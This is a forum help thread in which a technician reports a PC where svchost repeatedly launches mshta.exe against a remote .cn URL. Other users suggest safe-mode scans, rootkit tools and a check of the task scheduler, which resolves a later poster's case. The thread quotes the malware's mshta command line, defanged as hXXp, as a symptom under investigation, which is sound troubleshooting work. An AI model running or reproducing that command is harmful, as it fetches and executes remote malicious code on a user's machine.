MSHTA.EXE Problem

[PureITy]

We have a PC in for repair which has an issue with mshta.exe. The problem is that a svchost process is the parent of many mshta.exe children each have a command line of

mshta.exe hXXp://syhrywbjomwkphwxgknu.cn/s_t_t.php

When this process runs, Avast Antivirus blocks the result as a threat. Scanning the system with Avast, Spybot Search and Destroy, Ad-Aware, SuperantiSpyWare, combofix Malwarebytesand prevx show the system to be clean.
There seems to be a few users on the internet having similar issues with this problem. Does anyone know of a fix for the issue.

Many thanks
Paul.

[DavidR]

What is the purpose of posting the link, as it is to a blocked site (by the network shield), or is this the real reason of the post and not mshta.exe ?

Please modify the link, change the http to hXXP so the link isn't active, possibly exposing people to malware.

[PureITy]

Sorry.

The command line should have read "mshta.exe hXXp://syhrywbjomwkphwxgknu.cn/s_t_t.php
" where hXXP is http in the actual command line.

Sorry again for the slip!

This process runs every 15 minutes

Paul

[DavidR]

Yes, but I don't see the relationship between the two, where is this command line coming from ?

What is your firewall ?
As I believe what is an internal MS file like mshta.exe should have any need to access the internet, so something is either manipulation this file or has hacked it to try and connect and a firewall with outbound protection should detect this.

Whilst the file name matches the MS legit file, that is no guarantee it is legit. Try a system search for mshta.exe and report the locations it is in ?

Have you tried running SAS and MBAM from safe mode, they are more effective from there.

AdAware really is a waste of HDD space, IMHO and since both SAS and MBAM offer better detection and cleaning, etc. it really is redundant.

[PureITy]

The command line is from the properties of the mshta.exe process in Process Explorer.

We have tried sfc /purgecache but this has had not effect.

Have searched the c: drive for all occurrances of mshta and renamed all of them, but mshta.exe gets respawned.

Will do another scan with SAS and MBAM in safemode tomorrow.

Paul.

[DavidR]

But what were the locations, that was what I was after ?

You should be able to check and alter the properties

It is possible that there is another element that is hidden, possibly by rootkit:
Also see, anti-rootkit, detection, removal & protection http://www.antirootkit.com/software/index.htm. Try these as they are some of the more efficient and user friendly anti-rootkit tools.
- Panda Rootkit Cleaner - http://research.pandasoftware.com/blogs/images/AntiRootkit.zip.
- Trend Micro RootkitBuster - http://www.trendmicro.com/download/rbuster.asp
- F-Secure Blacklight may not always be available, http://www.f-secure.com/blacklight

I only have one occurrence of mshta.exe (XP Pro SP3) and it is in the system32 folder,

For this to try and run it have to have a registry entry, try a registry search (windows start, run, type msconfig) for mshta.exe as a data or value item. Or since there is a 15 repeat check the windows task scheduler and see if there isn't an entry there.

[CharleyO]

***

This file ... mshta.exe ... is a legal MS file and is needed for some operations. But, it could also be a malicious file as sometimes malware writers often name their files similar to legal files, depending on the location of the file. This is why David is asking for the complete location of this file.

Please read the links below for more information and understanding.

http://www.file.net/process/mshta.exe.html

http://www.what-is-exe.com/filenames/mshta-exe.html

http://www.filename.info/f/mshta.exe.html


***

[PureITy]

Have run SAS, MBAS and Avast in Safe Mode again today. Problem still exists.

The location of mshta.exe is in c:\windows\system32 and is 45K in size.
Also there are:

MSHTA.EXE-07121ECA.PF in c:\windows \prefetch - 58K
mshta.exe in c:\windows\servicepackfiles\i386 - 29K
mshta.exe.mui in c:\windows\system32\en-US - 3K
mshta.exe in c:\windows\SoftwareDistribution\Download\dd9ab...... - 29K

About to run each of the rootkit removal tools. Already run the AVG Anti-rootkit tool.

Paul.

[All American Sweetness]

I just want to thank you guys.  I too have had this annoying problem and have been searching the internet for days trying to find a way to rid myself of the last traces of this lil' bugger of a problem. This is the ONE forum that finally directed me to the windows task scheduler.  Yay!  I can now go do the dishes....

[CharleyO]

***

Welcome to the forums, All American Sweetness   

We are glad you were able to find help here.


***

[DavidR]

I just want to thank you guys.  I too have had this annoying problem and have been searching the internet for days trying to find a way to rid myself of the last traces of this lil' bugger of a problem. This is the ONE forum that finally directed me to the windows task scheduler.  Yay!  I can now go do the dishes....

No problem, glad I could help.

You have yourself to thank also, managing to find this relatively old topic with a hint about task manager.

Welcome to the forums.